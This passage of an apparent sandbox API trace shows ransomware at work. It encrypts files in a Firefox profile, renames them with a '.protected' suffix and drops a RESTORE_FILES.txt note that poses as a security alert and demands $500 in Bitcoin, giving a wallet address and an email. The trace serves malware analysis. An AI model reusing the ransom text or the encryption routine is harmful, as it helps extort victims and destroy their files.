cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.protected") returned 117 [0086.517] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_.protected")) returned 1 [0086.518] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.518] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.518] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\RESTORE_FILES.txt") returned 113 [0086.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.519] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.519] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.520] lstrlenA (lpString="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") returned 684 [0086.520] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.520] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.520] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.520] CloseHandle (hObject=0x154) returned 1 [0086.520] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="Windows") returned -1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="Program Files") returned -1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="Program Files (x86)") returned -1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="$Recycle.bin") returned 1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="System Volume Information") returned -1 [0086.520] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache") returned 102 [0086.520] lstrcmpW (lpString1="OfflineCache", lpString2=".") returned 1 [0086.520] lstrcmpW (lpString1="OfflineCache", lpString2="..") returned 1 [0086.520] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\*") returned 104 [0086.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.521] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.521] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.521] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.521] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.521] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.521] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\.") returned 104 [0086.521] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.521] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.522] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.522] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.522] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.522] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.522] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.522] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\..") returned 105 [0086.522] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.522] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="Windows") returned -1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="Program Files") returned -1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="Program Files (x86)") returned -1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="$Recycle.bin") returned 1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="System Volume Information") returned -1 [0086.522] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.522] StrStrIW (lpFirst="index.sqlite", lpSrch=".protected") returned 0x0 [0086.522] lstrcmpW (lpString1="index.sqlite", lpString2="RESTORE_FILES.txt") returned 
-1 [0086.522] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.522] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.523] StrStrW (lpFirst="index.sqlite", lpSrch=".txt") returned 0x0 [0086.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.523] StrStrW (lpFirst="index.sqlite", lpSrch=".rar") returned 0x0 [0086.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.523] StrStrW (lpFirst="index.sqlite", lpSrch=".zip") returned 0x0 [0086.523] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.525] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, 
nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.525] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.526] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.526] CloseHandle (hObject=0x158) returned 1 [0086.533] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.protected") returned 125 [0086.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite.protected")) returned 1 [0086.534] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.534] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.534] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\RESTORE_FILES.txt") returned 120 [0086.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.535] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.535] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.536] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.536] WriteFile (in: hFile=0x154, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.536] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.536] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.536] CloseHandle (hObject=0x154) returned 1 [0086.536] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="Windows") returned -1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="Program Files") returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="Program Files (x86)") returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="$Recycle.bin") returned 1 [0086.536] lstrcmpiW (lpString1="safebrowsing", lpString2="System Volume Information") returned -1 [0086.536] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing") returned 102 [0086.537] lstrcmpW (lpString1="safebrowsing", lpString2=".") returned 1 [0086.537] lstrcmpW (lpString1="safebrowsing", lpString2="..") returned 1 [0086.537] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\*") returned 104 [0086.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.549] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.549] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.549] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.549] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.549] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.549] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\.") returned 104 [0086.549] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.549] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.549] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.549] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.550] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.550] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.550] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\..") returned 105 [0086.550] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.550] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.550] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="Windows") returned -1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", 
lpString2="Program Files") returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="Program Files (x86)") returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="$Recycle.bin") returned 1 [0086.550] lstrcmpiW (lpString1="test-malware-simple.cache", lpString2="System Volume Information") returned 1 [0086.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.550] StrStrIW (lpFirst="test-malware-simple.cache", lpSrch=".protected") returned 0x0 [0086.550] lstrcmpW (lpString1="test-malware-simple.cache", lpString2="RESTORE_FILES.txt") returned 1 [0086.550] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.550] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.551] StrStrW (lpFirst="test-malware-simple.cache", lpSrch=".txt") returned 0x0 [0086.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.551] StrStrW (lpFirst="test-malware-simple.cache", lpSrch=".rar") returned 0x0 [0086.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache") returned 128 [0086.551] StrStrW (lpFirst="test-malware-simple.cache", lpSrch=".zip") returned 0x0 [0086.551] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.552] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.552] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.553] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.553] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.553] CloseHandle (hObject=0x158) returned 1 [0086.553] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.protected") returned 138 [0086.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.protected")) returned 1 [0086.554] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="Windows") returned -1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="Program Files") returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="Program Files (x86)") returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="$Recycle.bin") returned 1 [0086.554] lstrcmpiW (lpString1="test-malware-simple.pset", lpString2="System Volume Information") returned 1 [0086.554] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.554] StrStrIW (lpFirst="test-malware-simple.pset", lpSrch=".protected") returned 0x0 [0086.554] lstrcmpW (lpString1="test-malware-simple.pset", lpString2="RESTORE_FILES.txt") returned 1 [0086.554] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 
[0086.554] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.555] StrStrW (lpFirst="test-malware-simple.pset", lpSrch=".txt") returned 0x0 [0086.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 